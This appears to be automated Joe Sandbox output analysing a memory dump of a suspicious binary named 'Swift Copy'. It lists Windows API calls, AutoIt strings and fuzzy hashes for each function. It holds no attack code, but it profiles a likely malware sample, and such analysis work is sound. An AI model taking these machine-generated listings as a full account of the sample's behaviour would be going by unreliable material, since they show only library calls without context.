                                              • API String ID: 2610073882-625585964
                                              • Opcode ID: e9be2c39c9aa1cc5c7ff130e92ce411de287aa52d10ad7c50202dbb79e513980
                                              • Instruction ID: af5a738c8dae89ab6d4da12c27373c5a3afaddcbc20db223617569075b36968b
                                              • Opcode Fuzzy Hash: e9be2c39c9aa1cc5c7ff130e92ce411de287aa52d10ad7c50202dbb79e513980
                                              • Instruction Fuzzy Hash: DA918B71A00219ABDF20DFA5C888FAFBBB8EF46714F158559F605AB280D7709945CFB0
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DE125C
                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DE1284
                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DE12A8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE12D8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE135F
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE13C4
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE1430
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                              • String ID:
                                              • API String ID: 2550207440-0
                                              • Opcode ID: 41de89a6a50305afef3466e53ce6d4dbf18353d40d97a19551d2ee78f779d487
                                              • Instruction ID: fb41e5a6223ef13a90ecab7c62dea919d777be1bdc5fc303ffafa80a47b7982e
                                              • Opcode Fuzzy Hash: 41de89a6a50305afef3466e53ce6d4dbf18353d40d97a19551d2ee78f779d487
                                              • Instruction Fuzzy Hash: FB91E279A00248AFDB00EFA6C885BBE77B5FF45314F244029EA50E7291D774E945CBB0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: f3762a85812f57853bb1080cd3a03424452ab51c435c5c81895ee937592d5876
                                              • Instruction ID: 32ed678badc8811f17c257c17d85e92163e93d0d4146413927ca076f03e59c94
                                              • Opcode Fuzzy Hash: f3762a85812f57853bb1080cd3a03424452ab51c435c5c81895ee937592d5876
                                              • Instruction Fuzzy Hash: 35911571900219EFCB10DFA9C884AEEBBB8FF49320F188599E555B7251D375AA42CF70
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DF396B
                                              • CharUpperBuffW.USER32(?,?), ref: 00DF3A7A
                                              • _wcslen.LIBCMT ref: 00DF3A8A
                                              • VariantClear.OLEAUT32(?), ref: 00DF3C1F
                                                • Part of subcall function 00DE0CDF: VariantInit.OLEAUT32(00000000), ref: 00DE0D1F
                                                • Part of subcall function 00DE0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DE0D28
                                                • Part of subcall function 00DE0CDF: VariantClear.OLEAUT32(?), ref: 00DE0D34
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4137639002-1221869570
                                              • Opcode ID: b6f3525bf36f1ab70af061a136e2c815b6c8d0d9deb8606f607734a274a26377
                                              • Instruction ID: de8ea43b85244608e44c6652fbda800273e97ca4b445817e32d0c1e869e7069a
                                              • Opcode Fuzzy Hash: b6f3525bf36f1ab70af061a136e2c815b6c8d0d9deb8606f607734a274a26377
                                              • Instruction Fuzzy Hash: 699169756083059FC704EF28C49196AB7E4FF88314F15892EF98A9B351DB31EE45CBA2
                                              APIs
                                                • Part of subcall function 00DD000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?,?,00DD035E), ref: 00DD002B
                                                • Part of subcall function 00DD000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0046
                                                • Part of subcall function 00DD000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                                • Part of subcall function 00DD000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?), ref: 00DD0064
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DF4C51
                                              • _wcslen.LIBCMT ref: 00DF4D59
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DF4DCF
                                              • CoTaskMemFree.OLE32(?), ref: 00DF4DDA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 614568839-2785691316
                                              • Opcode ID: 59d7380f39ff9b3da707217bf4e529aef03406a4adbb29f1aec1de0449d55efa
                                              • Instruction ID: e8528cb21ab80507158c6ef8a217a8e7d67cd92f8aa8bb382e5dffcd60f895e9
                                              • Opcode Fuzzy Hash: 59d7380f39ff9b3da707217bf4e529aef03406a4adbb29f1aec1de0449d55efa
                                              • Instruction Fuzzy Hash: C791F571D0021DAFDF14DFA4C891AEEB7B8FF48314F11816AE919A7251EB309A458FB0
                                              APIs
                                              • GetMenu.USER32(?), ref: 00E02183
                                              • GetMenuItemCount.USER32(00000000), ref: 00E021B5
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E021DD
                                              • _wcslen.LIBCMT ref: 00E02213
                                              • GetMenuItemID.USER32(?,?), ref: 00E0224D
                                              • GetSubMenu.USER32(?,?), ref: 00E0225B
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E022E3
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                              • String ID:
                                              • API String ID: 4196846111-0
                                              • Opcode ID: 3088b948af75e87bc76662326e921fa6537c13767a3ee6fca22fee8684d025d7
                                              • Instruction ID: eaa34b890851000a847cce185857bd07e98abf031d49fdda1491c025571ee684
                                              • Opcode Fuzzy Hash: 3088b948af75e87bc76662326e921fa6537c13767a3ee6fca22fee8684d025d7
                                              • Instruction Fuzzy Hash: 1071A135A00205AFCB10EFA4C845AAEB7F5EF88314F10945DE916FB391D735ED818BA0
                                              APIs
                                              • GetParent.USER32(?), ref: 00DDAEF9
                                              • GetKeyboardState.USER32(?), ref: 00DDAF0E
                                              • SetKeyboardState.USER32(?), ref: 00DDAF6F
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DDAF9D
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DDAFBC
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DDAFFD
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DDB020
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction ID: 8648241d11b4d7c10ba7c3f9a3aacd9945cd506f3e3c93e6629acc857e64d216
                                              • Opcode Fuzzy Hash: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction Fuzzy Hash: 1451E0A16046D17DFB3643388845BBBBEA99F06318F0C858BF1D9559C2C399ACC8D771
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00DDAD19
                                              • GetKeyboardState.USER32(?), ref: 00DDAD2E
                                              • SetKeyboardState.USER32(?), ref: 00DDAD8F
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDADBB
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDADD8
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAE17
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAE38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction ID: 7303c175255fd97a745f3cccaa13961c6d3432e8f80318fb1f57e6fb2503a868
                                              • Opcode Fuzzy Hash: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction Fuzzy Hash: 1D5104A16047D53DFB3283388C45B7ABFA99B46300F0CC58AF1D556AC2D295EC88E772
                                              APIs
                                              • GetConsoleCP.KERNEL32(00DB3CD6,?,?,?,?,?,?,?,?,00DA5BA3,?,?,00DB3CD6,?,?), ref: 00DA5470
                                              • __fassign.LIBCMT ref: 00DA54EB
                                              • __fassign.LIBCMT ref: 00DA5506
                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00DB3CD6,00000005,00000000,00000000), ref: 00DA552C
                                              • WriteFile.KERNEL32(?,00DB3CD6,00000000,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA554B
                                              • WriteFile.KERNEL32(?,?,00000001,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA5584
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction ID: d3c5b2cf92df5acf89b4e2f1ab15caa632424531833e0984c9a6d0af2a1321ca
                                              • Opcode Fuzzy Hash: d3cb20b381c203f283ef61a5276a04a53a10cbdbd78700fe064c0c4d39a7b481
                                              • Instruction Fuzzy Hash: 2651B170E006499FDB10CFA9E845AEEBBF9EF0A300F14416AF955E7295D730DA45CB60
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92D4B
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00D92D53
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92DE1
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00D92E0C
                                              • _ValidateLocalCookies.LIBCMT ref: 00D92E61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction ID: e4e072498c4f67f4af0485ae6ee9b5a046c878a4217837fd54257358921a3985
                                              • Opcode Fuzzy Hash: 8164f4979820447c13f78f765578bf05d15e5e67f89df57534781dd0e25d6771
                                              • Instruction Fuzzy Hash: 7A418034A01209ABCF14DF68C885AAEBBB5FF44324F188155E814AB292D731EE45CBF0
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DF1112
                                              • WSAGetLastError.WSOCK32 ref: 00DF1121
                                              • WSAGetLastError.WSOCK32 ref: 00DF11C9
                                              • closesocket.WSOCK32(00000000), ref: 00DF11F9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 2675159561-0
                                              • Opcode ID: 29b12323d6af3854f32f3c3365ee6d906717199a9fa2bc69882316f5469c66bd
                                              • Instruction ID: a5ddcc3c301910ecf93028aad453ccf20a3c8ca84a350d17a2a078abf0768f00
                                              • Opcode Fuzzy Hash: 29b12323d6af3854f32f3c3365ee6d906717199a9fa2bc69882316f5469c66bd
                                              • Instruction Fuzzy Hash: D041F435600208EFDB109F24C884BB9B7E9EF45324F19C159FA49AB291D771EE85CBB1
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDCF45
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDCF7F
                                              • _wcslen.LIBCMT ref: 00DDD005
                                              • _wcslen.LIBCMT ref: 00DDD01B
                                              • SHFileOperationW.SHELL32(?), ref: 00DDD061
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 3164238972-1173974218
                                              • Opcode ID: 29965f0447db8769363b3cb48e236110bc0a805714f759f6d722223359687ed7
                                              • Instruction ID: 0826e6634df309fe17c42ddde51ae9c19e562163fa0a9f8d3491133a4675db43
                                              • Opcode Fuzzy Hash: 29965f0447db8769363b3cb48e236110bc0a805714f759f6d722223359687ed7
                                              • Instruction Fuzzy Hash: 0C4137719452195FDF12EFA4D981ADDB7B9EF48340F1400E7E549EB241EA34A688CB70
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E02E1C
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E4F
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02E84
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E02EB6
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E02EE0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E02EF1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E02F0B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction ID: 46ff6692474d3c28108a8ac3a0aa1d78ae3a0f7b6fd6a65858ef093b29dc72e8
                                              • Opcode Fuzzy Hash: 1a60229d87ca944a9f43f1eb0ac29c6276dab344cfdc77d95596239151a3397c
                                              • Instruction Fuzzy Hash: CA3119346441419FDB22CF59DC88F6537E4EB8A754F1411A8FA04AB2F1CB72A886DB01
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD7769
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD778F
                                              • SysAllocString.OLEAUT32(00000000), ref: 00DD7792
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77B0
                                              • SysFreeString.OLEAUT32(?), ref: 00DD77B9
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00DD77DE
                                              • SysAllocString.OLEAUT32(?), ref: 00DD77EC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
